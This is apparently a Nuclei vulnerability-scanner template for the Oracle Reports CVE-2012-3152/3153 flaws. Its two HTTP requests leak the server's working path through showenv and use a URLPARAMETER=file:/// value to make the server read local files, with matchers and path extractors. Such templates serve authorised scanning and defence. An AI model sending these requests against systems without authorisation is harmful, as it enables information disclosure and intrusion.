nuclei-templates/http/cves/2012/CVE-2012-3153.yaml

id: CVE-2012-3153

info:
  name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
  author: Sid Ahmed MALAOUI @ Realistic Security
  severity: medium
  description: |
    An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
    11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
    vectors related to Report Server Component.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-3152
    - https://www.exploit-db.com/exploits/31737
    - https://www.oracle.com/security-alerts/cpuoct2012.html
    - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
    - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
    cvss-score: 6.4
    cve-id: CVE-2012-3153
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.97048
    cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
    epss-percentile: 0.99647
  metadata:
    max-request: 2
    vendor: oracle
    product: fusion_middleware
  tags: cve,cve2012,oracle,rce,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/reports/rwservlet/showenv"
      - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"

    req-condition: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "Reports Servlet")'

      - type: dsl
        dsl:
          - '!contains(body_2, "<html")'
          - '!contains(body_2, "<HTML")'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: windows_working_path
        regex:
          - ".?.?\\\\.*\\\\showenv"

      - type: regex
        name: linux_working_path
        regex:
          - "/.*/showenv"